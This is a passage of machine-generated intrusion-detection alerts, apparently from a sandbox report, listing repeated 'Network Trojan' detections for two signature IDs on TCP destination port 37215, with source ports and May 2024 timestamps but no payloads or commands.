                SID:2829579
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279276
                SID:2829579
                Source Port:50628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994419
                SID:2835222
                Source Port:40348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083129
                SID:2829579
                Source Port:42224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962960
                SID:2829579
                Source Port:41396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385432
                SID:2835222
                Source Port:44576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972182
                SID:2829579
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.038168
                SID:2829579
                Source Port:52472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597842
                SID:2829579
                Source Port:45556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.105019
                SID:2829579
                Source Port:41504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019179
                SID:2835222
                Source Port:35564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.234038
                SID:2829579
                Source Port:50848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449703
                SID:2835222
                Source Port:33142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.232508
                SID:2835222
                Source Port:51596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855883
                SID:2829579
                Source Port:33882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902191
                SID:2835222
                Source Port:53598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440796
                SID:2829579
                Source Port:38322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361665
                SID:2835222
                Source Port:53572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070128
                SID:2829579
                Source Port:54724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842358
                SID:2835222
                Source Port:48868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025419
                SID:2829579
                Source Port:47148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282085
                SID:2829579
                Source Port:48482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936411
                SID:2835222
                Source Port:46836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.270292
                SID:2835222
                Source Port:50830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706432
                SID:2835222
                Source Port:55786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265927
                SID:2829579
                Source Port:49068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113443
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902100
                SID:2835222
                Source Port:39080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.018707
                SID:2829579
                Source Port:47642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277573
                SID:2829579
                Source Port:49564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762818
                SID:2829579
                Source Port:36968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520504
                SID:2829579
                Source Port:41982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559729
                SID:2829579
                Source Port:35726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325452
                SID:2829579
                Source Port:54038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867972
                SID:2835222
                Source Port:40060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558690
                SID:2835222
                Source Port:60700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785582
                SID:2829579
                Source Port:41688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982014
                SID:2835222
                Source Port:38002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.810464
                SID:2829579
                Source Port:37830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790761
                SID:2829579
                Source Port:38160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.274428
                SID:2829579
                Source Port:49864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767026
                SID:2829579
                Source Port:43364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586638
                SID:2829579
                Source Port:41452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.712331
                SID:2835222
                Source Port:44936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209774
                SID:2829579
                Source Port:54098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993910
                SID:2835222
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.223918
                SID:2829579
                Source Port:60780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897427
                SID:2835222
                Source Port:44234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974315
                SID:2835222
                Source Port:42646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722750
                SID:2835222
                Source Port:35514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653106
                SID:2829579
                Source Port:40168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.739070
                SID:2835222
                Source Port:36516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231224
                SID:2829579
                Source Port:39180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432764
                SID:2829579
                Source Port:47314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931288
                SID:2835222
                Source Port:36336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836023
                SID:2829579
                Source Port:41610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990620
                SID:2829579
                Source Port:57736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893956
                SID:2835222
                Source Port:39052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977604
                SID:2835222
                Source Port:58642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329162
                SID:2835222
                Source Port:53892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113967
                SID:2835222
                Source Port:50504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102407
                SID:2835222
                Source Port:52516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166884
                SID:2835222
                Source Port:34988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.129115
                SID:2835222
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764672
                SID:2829579
                Source Port:52862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598251
                SID:2835222
                Source Port:44862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763233
                SID:2835222
                Source Port:36082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899602
                SID:2829579
                Source Port:35298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945654
                SID:2835222
                Source Port:51980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474827
                SID:2829579
                Source Port:44080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652698
                SID:2829579
                Source Port:57626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559237
                SID:2829579
                Source Port:34910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910986
                SID:2835222
                Source Port:50916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966509
                SID:2835222
                Source Port:40278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.532395
                SID:2835222
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899470
                SID:2829579
                Source Port:35170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.387236
                SID:2835222
                Source Port:49058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813070
                SID:2829579
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824475
                SID:2835222
                Source Port:34810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884007
                SID:2829579
                Source Port:58500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038094
                SID:2829579
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435946
                SID:2835222
                Source Port:48352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045611
                SID:2829579
                Source Port:60854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782217
                SID:2829579
                Source Port:45196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.725442
                SID:2835222
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133591
                SID:2829579
                Source Port:53208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583744
                SID:2835222
                Source Port:33456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.421397
                SID:2829579
                Source Port:51844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913729
                SID:2829579
                Source Port:53650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.771171
                SID:2829579
                Source Port:46542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861948
                SID:2835222
                Source Port:50136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.013590
                SID:2835222
                Source Port:50040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212866
                SID:2835222
                Source Port:46016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009719
                SID:2829579
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091817
                SID:2829579
                Source Port:52532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372219
                SID:2835222
                Source Port:57992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184973
                SID:2835222
                Source Port:52576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796719
                SID:2829579
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840766
                SID:2835222
                Source Port:40838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264795
                SID:2829579
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766370
                SID:2829579
                Source Port:49338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574731
                SID:2829579
                Source Port:57310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092230
                SID:2835222
                Source Port:53126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.824050
                SID:2829579
                Source Port:57976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042083
                SID:2835222
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809593
                SID:2835222
                Source Port:43292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175536
                SID:2835222
                Source Port:41962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434892
                SID:2829579
                Source Port:38024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873116
                SID:2835222
                Source Port:43302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957644
                SID:2829579
                Source Port:55994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997742
                SID:2829579
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286653
                SID:2835222
                Source Port:52620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282237
                SID:2829579
                Source Port:49102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209634
                SID:2829579
                Source Port:55572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441549
                SID:2835222
                Source Port:39786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170230
                SID:2829579
                Source Port:35090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574061
                SID:2835222
                Source Port:56034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325555
                SID:2829579
                Source Port:53934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762667
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421144
                SID:2835222
                Source Port:54460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501796
                SID:2835222
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586284
                SID:2829579
                Source Port:51198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689588
                SID:2835222
                Source Port:47816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902889
                SID:2829579
                Source Port:35952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583493
                SID:2835222
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320896
                SID:2829579
                Source Port:53942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212954
                SID:2835222
                Source Port:38566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209757
                SID:2829579
                Source Port:42850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763124
                SID:2829579
                Source Port:41056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014954
                SID:2829579
                Source Port:56788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597972
                SID:2835222
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916829
                SID:2835222
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834525
                SID:2835222
                Source Port:33452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227352
                SID:2835222
                Source Port:49576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418753
                SID:2835222
                Source Port:53888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.812257
                SID:2835222
                Source Port:53918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886206
                SID:2829579
                Source Port:49572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940235
                SID:2829579
                Source Port:51112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840728
                SID:2829579
                Source Port:57446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.449690
                SID:2835222
                Source Port:42170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581215
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655080
                SID:2829579
                Source Port:46578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967425
                SID:2835222
                Source Port:52652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567347
                SID:2829579
                Source Port:55866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419991
                SID:2829579
                Source Port:37192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266147
                SID:2829579
                Source Port:33254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943921
                SID:2829579
                Source Port:60156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022159
                SID:2829579
                Source Port:51646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.572092
                SID:2829579
                Source Port:42890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.607430
                SID:2835222
                Source Port:51462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783143
                SID:2829579
                Source Port:51262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919897
                SID:2829579
                Source Port:55788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563511
                SID:2835222
                Source Port:47294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784058
                SID:2829579
                Source Port:54220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.265120
                SID:2835222
                Source Port:58362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881160
                SID:2829579
                Source Port:34964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072198
                SID:2829579
                Source Port:56492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176892
                SID:2829579
                Source Port:58968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.374325
                SID:2829579
                Source Port:39788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891273
                SID:2835222
                Source Port:60556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586810
                SID:2835222
                Source Port:41524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216816
                SID:2829579
                Source Port:59558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654432
                SID:2829579
                Source Port:36194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715067
                SID:2835222
                Source Port:34252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840125
                SID:2835222
                Source Port:39738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881482
                SID:2835222
                Source Port:56370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967646
                SID:2829579
                Source Port:44222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173295
                SID:2835222
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883858
                SID:2829579
                Source Port:60850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841364
                SID:2835222
                Source Port:43238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782617
                SID:2829579
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968270
                SID:2835222
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931361
                SID:2835222
                Source Port:34194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791484
                SID:2829579
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830790
                SID:2835222
                Source Port:52136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.504428
                SID:2829579
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.577207
                SID:2835222
                Source Port:37184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911011
                SID:2829579
                Source Port:60092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209443
                SID:2829579
                Source Port:57682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571165
                SID:2835222
                Source Port:45630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871673
                SID:2835222
                Source Port:50452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965608
                SID:2829579
                Source Port:54610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653812
                SID:2835222
                Source Port:36400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533785
                SID:2829579
                Source Port:37556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896116
                SID:2835222
                Source Port:37552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857016
                SID:2829579
                Source Port:55850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075110
                SID:2835222
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135397
                SID:2829579
                Source Port:38200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009897
                SID:2835222
                Source Port:50812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262379
                SID:2835222
                Source Port:45200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665120
                SID:2829579
                Source Port:54178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227718
                SID:2835222
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931336
                SID:2829579
                Source Port:57764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076225
                SID:2835222
                Source Port:43908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292641
                SID:2829579
                Source Port:33834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993584
                SID:2829579
                Source Port:45346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596806
                SID:2829579
                Source Port:45506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.799595
                SID:2829579
                Source Port:53510
                Destination Port:37215
